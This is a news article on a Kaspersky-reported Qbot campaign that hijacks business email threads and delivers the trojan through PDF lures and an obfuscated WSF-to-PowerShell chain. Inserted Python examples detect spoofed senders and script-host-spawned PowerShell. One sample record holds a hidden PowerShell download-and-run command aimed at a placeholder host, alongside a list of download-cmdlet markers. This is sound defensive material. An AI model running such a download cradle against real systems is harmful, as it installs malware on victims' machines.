


Apurva Venkat
Special Correspondent

New Qbot campaign delivers malware by hijacking business emails

Apr 18, 2023 | 3 mins
Email Security, Malware

The new Qbot email campaign uses a combination of PDF and WSF to install the malware and steal the victim’s banking credentials.


Cyberattacks using banking trojans of the Qbot family have been targeting companies in Germany, Argentina, and Italy since April 4 by hijacking business email threads, according to research by cybersecurity firm Kaspersky.

In the latest campaign, the malware is delivered through emails written in English, German, Italian, and French. The messages are based on real business emails that the attackers have gained access to. This gives the attackers the opportunity to join the correspondence thread with messages of their own, Kaspersky said in its report.

Through such emails, the attackers try to persuade the victim to open an attached PDF, which starts the chain that eventually installs the Qbot trojan on the victim's computer.

Qbot, also known as Qakbot or Pinkslipbot, is a banking trojan first observed in 2007 that is designed to steal victims' banking credentials. The trojan has gone through multiple modifications and improvements and has become one of the most actively distributed malware families.

“Such simulated business correspondence can obstruct spam tracking while increasing the probability of the victim falling for the trick,” Kaspersky said.

“For authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field; however, the sender’s fraudulent email address will be different from that of the real correspondent,” Kaspersky said in the report.
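The tell Kaspersky describes is mechanical enough to check at the mail gateway: the display name in the From header matches someone the mailbox owner has really corresponded with, but the address behind it does not, and the message is inserted into an existing thread with a PDF attached. The following is an added example of that triage, not Kaspersky's tooling or anything from the report; the contact directory and the three messages are constructed for illustration, and the lookalike domains are placeholders.

```python
"""Triage inbound replies for the hijacked-thread pattern: From display name
matches a known correspondent, the address does not, the message continues an
existing thread, and it carries a PDF.  Added example; contacts, messages and
domains below are constructed, not taken from the campaign."""
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed directory: display name -> addresses previously seen for that person.
KNOWN_CORRESPONDENTS = {
    "Maria Rossi": {"maria.rossi@example-partner.it"},
    "Jonas Weber": {"j.weber@example-gmbh.de"},
}


def triage(raw_message: str, known=KNOWN_CORRESPONDENTS) -> dict:
    """Return indicator flags plus a verdict for one RFC 5322 message."""
    msg = message_from_string(raw_message, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
    seen = {a.lower() for a in known.get(name.strip(), set())}
    name_known = bool(seen)
    # The campaign's tell: a familiar name in front of an unfamiliar address.
    address_mismatch = name_known and addr.lower() not in seen
    # Inserted into an existing correspondence thread?
    is_reply = bool(msg.get("In-Reply-To") or msg.get("References"))
    pdf_attachments = [
        part.get_filename() or ""
        for part in msg.iter_attachments()
        if (part.get_filename() or "").lower().endswith(".pdf")
        or part.get_content_type() == "application/pdf"
    ]
    if address_mismatch and is_reply:
        verdict = "thread_hijack"
    elif address_mismatch:
        verdict = "spoofed_display_name"
    elif not name_known:
        verdict = "unknown_sender"
    else:
        verdict = "ok"
    return {
        "display_name": name,
        "address": addr,
        "address_mismatch": address_mismatch,
        "is_reply": is_reply,
        "pdf_attachments": pdf_attachments,
        "verdict": verdict,
    }


def build_sample(from_hdr: str, in_reply_to: str = "", pdf: bool = False) -> str:
    """Construct a sample message (not a real capture) for the demonstration."""
    m = EmailMessage()
    m["From"] = from_hdr
    m["To"] = "accounts@example-corp.com"
    m["Subject"] = "Re: invoice 4471"
    if in_reply_to:
        m["In-Reply-To"] = in_reply_to
    m.set_content("Please open the attached file to view the documents.")
    if pdf:
        # Placeholder bytes standing in for the lure PDF; not a real document.
        m.add_attachment(b"%PDF-1.4\n%constructed placeholder\n",
                         maintype="application", subtype="pdf",
                         filename="invoice_4471.pdf")
    return m.as_string()


SAMPLES = {
    # Genuine reply from the known correspondent's real address.
    "legit": build_sample("Maria Rossi <maria.rossi@example-partner.it>",
                          in_reply_to="<abc@example-partner.it>"),
    # Hijacked thread: real display name, attacker-controlled address, PDF lure.
    "hijacked": build_sample("Maria Rossi <maria.rossi@example-lookalike.com>",
                             in_reply_to="<abc@example-partner.it>", pdf=True),
    # Cold message from nobody in the directory.
    "cold": build_sample("Billing Team <billing@example-unrelated.net>", pdf=True),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        result = triage(raw)
        print(f"{label:9s} {result['verdict']:22s} pdf={result['pdf_attachments']}")
```

The directory lookup is deliberately keyed on display name rather than address: the attacker controls the address, and the whole point of the lure is that the name is the one the recipient expects. In production the directory would be built from the mailbox's own sent and received history, and a display-name hit with a new address should be treated as suspicious even without an attachment.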

Use of PDF and WSF files to install the trojan

The Qbot delivery campaign begins with an email carrying a PDF attachment. The PDF's content imitates a Microsoft Office 365 or Microsoft Azure alert and urges the victim to click "Open to view the attached files." Once the victim does so, an archive is downloaded from a remote server.

"In the downloaded archive, there is a .wsf (Windows Script File) file containing an obfuscated script written in JScript," Kaspersky said. When the WSF file is de-obfuscated, a PowerShell payload is revealed.

The PowerShell script runs on the victim's computer and downloads the Qbot trojan, which then attempts to steal the victim's banking credentials.
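The WSF-to-PowerShell stage leaves a distinctive parent/child footprint in process-creation telemetry: the Windows Script Host (wscript.exe or cscript.exe) is launched with a .wsf file on its command line and then spawns powershell.exe, typically with a download cmdlet and a hidden window. The following is an added detection example, not Kaspersky's code or a signature from the report; the Sysmon-style records are constructed, not captured from an infection, and the paths, PIDs and URL are placeholders.

```python
"""Correlate process-creation records for the WSF -> PowerShell stage:
a script host running a .wsf spawns a PowerShell that fetches a payload.
Added example; the records, paths, PIDs and URL below are constructed."""
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("powershell.exe", "pwsh.exe")
# Command-line fragments that indicate the child shell is a downloader.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "start-bitstransfer", "curl ")
WSF_PATH = re.compile(r'"?([^"\s]+\.wsf)"?', re.IGNORECASE)

# Constructed Sysmon EID 1-style records, reduced to the fields the rule needs,
# in the order they would be ingested (parents before children).
EVENTS = [
    {"pid": 4120, "ppid": 988, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Stage 1: victim opens the .wsf from the downloaded archive.
    {"pid": 5212, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\report_2023\doc.wsf"'},
    # Stage 2: de-obfuscated JScript launches a hidden PowerShell downloader.
    {"pid": 5300, "ppid": 5212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/p')\""},
    # Benign: an admin opens PowerShell from the desktop.
    {"pid": 6001, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    # Benign: a .vbs logon script via cscript whose child is not a shell.
    {"pid": 6100, "ppid": 988, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe \\dc\netlogon\map.vbs"},
    {"pid": 6110, "ppid": 6100, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use H: \\fs\home"},
]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_wsf_to_powershell(events) -> list:
    """Return one alert per PowerShell whose parent is a script host running a .wsf."""
    by_pid, alerts = {}, []
    for ev in events:
        by_pid[ev["pid"]] = ev
        if image_name(ev["image"]) not in SHELLS:
            continue
        parent = by_pid.get(ev["ppid"])
        if parent is None or image_name(parent["image"]) not in SCRIPT_HOSTS:
            continue
        match = WSF_PATH.search(parent["cmdline"])
        if match is None:
            continue  # script host, but not running a .wsf
        cmd = ev["cmdline"].lower()
        downloader = any(marker in cmd for marker in DOWNLOAD_MARKERS)
        hidden = "-w hidden" in cmd or "windowstyle hidden" in cmd
        alerts.append({
            "pid": ev["pid"],
            "parent_pid": parent["pid"],
            "wsf": match.group(1),
            "downloader": downloader,
            "hidden_window": hidden,
            "severity": "high" if downloader else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_wsf_to_powershell(EVENTS):
        print(alert)
```

The rule fires on the parent/child relationship first and uses the download markers only to raise severity, because the script host spawning a shell is the rarer event in most fleets and survives renaming of the cmdlets; the .wsf path from the parent command line is kept in the alert so the responder can pull the file for de-obfuscation.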

New campaign peaked between April 4 and April 12

The first emails with malicious PDF attachments began to arrive on the evening of April 4. The mass email campaign began at 12:00 pm on the following day and continued until 9:00 pm, Kaspersky said.

During this time approximately 1,000 emails in total were detected. The second upsurge began on April 6 at noon, with over 1,500 emails dispatched. "For the next few days new messages kept coming, and soon, on the evening of April 12 we discovered another upsurge with 2,000 more letters (emails) sent to our customers," Kaspersky said. Since then the activity has declined, but users still receive fraudulent messages.

The campaign mainly targets users in Germany, Argentina, and Italy.

In March, Qbot was the most prevalent malware worldwide, impacting more than 10% of organizations, according to Check Point. Qbot employs several anti-VM, anti-debugging, and anti-sandbox techniques to hinder analysis and evade detection.

The trojan's distribution methods have also evolved. Earlier, it was distributed through infected websites and pirated software. "Now the banker (banking trojan) is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings," Kaspersky said.


Apurva Venkat is principal correspondent for the India editions of CIO, CSO, and Computerworld. She has previously worked at ISMG, IDG India, Bangalore Mirror, and Business Standard, where she reported on developments in technology, businesses, startups, fintech, e-commerce, cybersecurity, civic news, and education.
